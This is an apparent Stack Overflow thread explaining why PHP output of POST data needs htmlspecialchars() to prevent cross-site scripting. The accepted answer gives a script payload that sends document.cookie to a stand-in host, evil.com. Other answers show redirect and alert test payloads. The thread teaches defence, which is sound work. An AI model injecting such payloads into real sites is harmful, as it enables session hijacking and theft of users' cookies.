# Is this much escaping necessary?

Tags: php, security, code-injection

I was looking at the [**php.net manual**](http://www.php.net/manual/en/tutorial.forms.php) and it had this line of code:

```
Hi <?php echo htmlspecialchars($_POST['name']); ?>.
You are <?php echo (int)$_POST['age']; ?> years old.
```

It says underneath:

> htmlspecialchars() makes sure any characters that are special in html are properly encoded so people can't inject HTML tags or Javascript into your page.

Is this really necessary?

Can someone actually put in malious code into that one line? What is there to worry about? Can something be injected into that line to run some php code? Are they just getting people accustomed to watching for this even though there is no threat in this case?

Comment: Yes it is. Even if there was no security problem (there is, see answers), it's massively annoying if a page breaks (or silently cuts out part of the input) due to someone entering perfectly fine data that just happens to feature some characters used in HTML markup.

Comment: I thought you are calling `htmlspecialcharacters` twice

Comment: A good rule of thumb when writing web applications is to **never** trust user input.

Answer (score 5, accepted):

If someone's name happened to be:

```
<script>document.write('<img src="http://www.evil.com/worm.php?'+document.cookie+'"/>');</script>
```

Then a worm could be unleashed on your site.  In essence the worm is just a script that takes the users session cookie, logs in, and then does malicious stuff, replicating itself as more people view it.

Comment: Great example of cookie stealing. +1.

Answer (score 4):

Yes, it's necessary. See Wikipedia for information on [cross-site scripting vulnerabilities](http://en.wikipedia.org/wiki/Cross-site_scripting).

PHP can't be run using XSS, but an attacker could steal a session cookie. Potentially disastrous if that session cookie is for an administrator on a CMS, as an example.

Comment: What in the world would make that happen in this case? If he put in something like `'; phpinfo(); '`?

Comment: No, he'd put in JavaScript code that makes a request that passes user's `document.cookie` value off to a third-party server. As I said, PHP can't be run via this sort of exploit (unless you're `eval`ing $_POST variables or something).

Comment: @ceejayoz `eval`ing user input... Now that's always a brilliant idea!

Comment: @NullUserException I've seen it happen. Scary times! I've seen loads of `include()` calls using unescaped, unvalidated POST data, too (i.e. `include($_POST['page'] . '.php');`)

Comment: Is there any danger to the server though? Can he run php code on the server?

Comment: @qwertymk 1. Who cares? Danger to the site and its users is bad enough. Why be lazy? 2. Possibly, if XSS allows a user to get admin access to your site. If you're not preventing XSS, you've likely got other security holes for them to enjoy.

Comment: @qwertymk PHP code can't be executed through an XSS unless you're putting the input through something like `eval()` or `shell_exec()` on the server side.

Answer (score 2):

It's not only for security. For example if you receive `Fred&Jen` as `$_POST['name']` it would make a XML document invalid.

Answer (score 2):

The threat here is [XSS](http://en.wikipedia.org/wiki/Cross-site_scripting). It's Javascript code that an attacker would try to execute using an XSS attack.

To see for yourself, remove the htmlspecialchars() then post this as `name`:

```
<script>alert('xss')</script>
```

You'll see that your PHP code will print that out and the browser will execute the Javascript.
The most common XSS attacks are on web applications where a user has a logged in session. A successfull XSS attack could read the victim's session ID cookie using `document.cookie` and then send it to the attackers website where the attacker could proceed with a session hijack.

This attack is known as a **Reflective XSS**. A more severe type of XSS is a **Persistent XSS** which is where you store the input to a database for example, then you print it out on your homepage for all users to see, or any other page. A persistent XSS is much more harmful because any visitor of the page where the XSS persists can be attacked without actually having to re-launch the attack for each victim.

Answer (score 1):

If you are only going to print what that same users posts, they cannot do much harm to you or other users. However, it is useful nevertheless as user might use ">" and "<" and they would ruin the representation of the content.

However, if you are going to show the content which other users submit, this becomes much more dangerous.

User can inject anything from links to other sites to javascript.

```
<script>window.location = 'http://www.evilsite.com';</script>
```

And all users who come to the site which displays this bit of user submitted content will be redirected to evilsite.

Comment: You're saying a reflective XSS can't do any harm? There are lots of ways to exploit a reflective XSS, just because it's not a persistent XSS it doesn't mean it's invulnerable.

Answer (score 0):

Yeah, someone could for example inject some Javascript code, which when displayed would for example redirect them to another site (which is fairly harmless).

example:

```
<script type="text/javascript">
window.location = "http://www.google.com/"
</script>
```

Would redirect the user to google if it were to be posted without being escaped

Answer (score 0):

PHP code cannot be injected into that field as it is not evaluated by the PHP interpreter, however it does introduce the potential for cross site scripting.

You can test this by using something like this:

```
<form action="" method="POST">
<input type="text" name="name"/>
<input type="submit"/>
</form>

<?php
if(isset($_POST['name'])){?>
    Hi <?php echo htmlspecialchars($_POST['name']); ?>.
<?php}?>
```

Then in the "name" field, submit this code and see what happens:

```
<script type="text/javascript">alert("P0WN3D");</script>
```

Answer (score 0):

*Can someone actually put in malious code into that one line?*
Yes.

[image]

Comment: While funny, this is a SQL injection which wasn't what I asked about

Comment: True your question pertains to client-side vulnerabilities.  On the other hand, the lesson learned here is the same: never render unsanitized input.  Doesn't matter if it is client side, server side, SQL, HTML, PHP, Perl, whatever.  If you write code that accepts input from untrusted sources, don't render the input directly.